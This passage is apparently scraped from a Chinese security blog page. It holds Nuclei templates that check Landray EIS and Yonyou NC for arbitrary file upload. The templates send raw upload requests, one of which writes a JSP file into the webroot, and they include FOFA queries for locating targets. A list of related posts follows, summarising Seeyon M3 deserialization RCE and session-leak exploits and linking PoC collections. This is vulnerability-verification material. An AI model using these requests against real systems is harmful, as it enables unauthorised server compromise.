        Accept-Encoding: gzip

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and
id: landray-eis-saveimg-fileupload

info:
  name: 蓝凌eis智慧协同平台任意文件上传
  author: fgz
  severity: critical
  tags: landray,fileupload
  description: |
    蓝凌eis智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。其存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
  metadata:
    max-request: 3
    fofa-query: icon_hash="953405444"
    hunter-query:
    verified: true

variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
  file_content: "{{to_lower(rand_text_alpha(26))}}"

http:
  - raw:
      - |
        POST /eis/service/api.aspx?action=saveImg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

        ------WebKitFormBoundaryxdgaqmqu
        Content-Disposition: form-data; name="file"filename="{{file_name}}"
        Content-Type: text/html
        
        {{file_content}}
        ------WebKitFormBoundaryxdgaqmqu--
          
      - |
        GET {{file_name2}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    extractors:
      - type: kval
        name: file_name2
        internal: true
        kval:
          - body
    matchers:
      - type: word
        words:
          - "{{file_content}}"
        part: body

模板 五

1.文件上传

2.正则表达式

id: yonyou-nc-accept-fileupload

info:
  name: 用友NC accept.jsp任意文件上传漏洞
  author: fgz
  severity: critical
  description: |
    用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
  reference:
    none
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1085941792"
  tags: yonyou,nc,fileupload,2023

variables:
  boundary: '{{rand_base(29)}}'

http:
  - raw:
      - |
        POST /aim/equipmap/accept.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=---------------------------{{boundary}}
        Accept-Encoding: gzip

        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt"
        Content-Type: text/plain

        <% out.println("{{randstr_2}}"); %>
        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="fname"

        \webapps\nc_web\{{randstr_3}}.jsp
        -----------------------------{{boundary}}--
      - |
        GET /{{randstr_3}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and

poc收集

一个正在更新的poc

https://github.com/Vme18000yuan/FreePOC/

https://github.com/MD-SEC/MDPOCS

ka_ka11
关注
致远M3 反序列化RCE漏洞复现(XVE-2023-24878)
0xSec
11-24 5858
致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
【漏洞复现】致远-M3-信息泄露-mobile_portal
最新发布
知黑而守白
07-05 444
致远OA移动智能办公平台mobile_portal接口处存在敏感信息泄露漏洞,未授权访问的日志文件泄露数据包括用户名、session和系统接口信息等,恶意攻击者可能利用该敏感信息对服务器进行进一步的攻击,从容团队服务器造成危害。致远OA移动智能办公平台是一款基于移动互联网和云计算技术的移动办公软件,为企业提供随时随地、安全高效的办公体验。1、限制接口访问权限。
漏洞复现--致远 M3 反序列化 mobile_portal RCE
qq_53003652的博客
11-27 5458
M3server提供了多种功能模块,涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口。严格限制/mobile_portal/接口的访问权限,关注厂家官网获取修复补丁。使用ysoserial生成CB链TomcatCmdEcho回显内存马。利用CB1链生成hex代码,替换POC中的HEX。执行命令,在请求内容加上cmd执行命令回显。致远M3 server。成功执行ping命令。
致远M3-server 反序列化RCE漏洞
m0_71285176的博客
01-10 2168
致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远M3移动办公系统平台存在敏感信息泄露/未授权访问漏洞
weixin_43167326的博客
05-07 1749
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
zz12345600354的博客
04-26 904
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow SparkProvider 任意文件读取漏洞(CVE-2023-40272)。针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其中 NPM 组件包 mall-front-babel-directive。
漏洞报告模板.docx
06-06
- **验证过程**:描述如何验证漏洞的有效性,比如通过编写POC代码、利用公开的漏洞利用框架等。 - **验证结果**:展示验证过程中收集到的数据,证明漏洞确实存在。 ##### 4. 弱口令 - **定义**:解释什么是弱口令...
2024年网安最新CVE-2024-3580 Cisco ASA安全软件XSS漏洞
2401_84298087的博客
05-03 898
— | — || 威胁等级 | 中危 || 影响面 | 一般 || 攻击者价值 | 较高 || 利用难度 | 低 || 360CERT评分 | 6.1 |
WPS出现0day漏洞,升级保障安全,速速行动
cc123489ll的博客
06-24 1158
近日,监测发现WPS Office for Windows版本存在0day漏洞,攻击者可以利用该0day漏洞在受害者主机上执行任意恶意文件;目前已经发现了该Oday漏洞的在也利用。
工控安全 西门子S7-300攻击分析_plc300漏洞
2401_84264536的博客
04-27 1313
一、概述随着等保2.0的普及,工控安全大家也越来越重视,研究工控安全的小伙伴也越来越多。工控安全主要包括工控设备私有协议的安全分析,工控设备固件系统安全以及工控设备应用程序安全等。西门子PLC广泛应用于工业控制系统,本文主要描述西门子PLC系列S7-300的攻击过程与思路,并介绍演示一些适合小伙伴们学习的工控工具和框架。如有错误之处,欢迎指正,共同学习进步。
各类POC集合大全
04-26
各类POC集合大全 没细看 1000多个吧 需要的可以下载下来看看
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
致远M3-server反序列化RCE
weixin_62352348的博客
01-19 1189
致远M3-server反序列化RCE
致远M3 log 敏感信息泄露漏洞
一个努力学习网安的小牛马
05-08 840
session信息泄露
致远M3 Session 敏感信息泄露漏洞复现
0xSec
05-07 1642
致远M3 server多个日志文件存在敏感信息泄露漏洞,允许未经身份验证的远程攻击者访问日志文件,泄露了登陆用户名及session等敏感信息,使系统处于极不安全的状态。
(1day)致远M3 log 敏感信息泄露漏洞(Session)复现
记录开发和安全学习过程中的点点滴滴
05-08 2142
系统学习web漏洞挖掘以及项目实战也有一段时间了,发现在漏洞挖掘过程中难免会碰到一些历史漏洞,来帮助自己或是提高自己挖洞和及时发现漏洞效率,于是开始创建这个专栏,对第一时间发现的1day以及历史漏洞进行复现,来让自己更加熟悉漏洞类型以及历史漏洞,方便自己在后续的项目实战中,碰到漏洞能够及时去查询和复现.
反序列化漏洞
m0_63444285的博客
04-04 1713
反序列化漏洞通常会出现在Java、.NET、PHP等语言的应用程序中,例如Java中的ObjectInputStream、XMLDecoder,.NET中的BinaryFormatter、JavaScriptSerializer等,PHP中的unserialize函数等。反序列化漏洞(Deserialization Vulnerability)是指攻击者利用应用程序在反序列化操作中的漏洞,将恶意序列化对象注入到应用程序中,从而执行未授权的操作或者以应用程序的身份执行恶意代码,从而导致系统被攻击的一种漏洞。
开发实战(5)--fofa进行漏洞poc的信息收集
记录开发和安全学习过程中的点点滴滴
04-21 3223
突破fafa信息采集时只能查看5页数据, 主要还是围绕渗透测试的流程进行开发,一般在信息收集后,在渗透测试后,在发现通用型漏洞时,我们为了节省时间,可以通过写批量脚本来信息收集,然后使用poc来进行批量验证.作为一个fofa工程师,那么我们当然是使用fofa进行信息搜集喽,刚好也借着这个机会熟悉一下fofa的API文档,为后面写利用工具做好铺垫,当然目前还是用不到API的,问就是用不起,所以只能写脚本突破注册会员限制进行信息爬取。
反序列化漏洞详解
qq_48904485的博客
03-21 4218
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值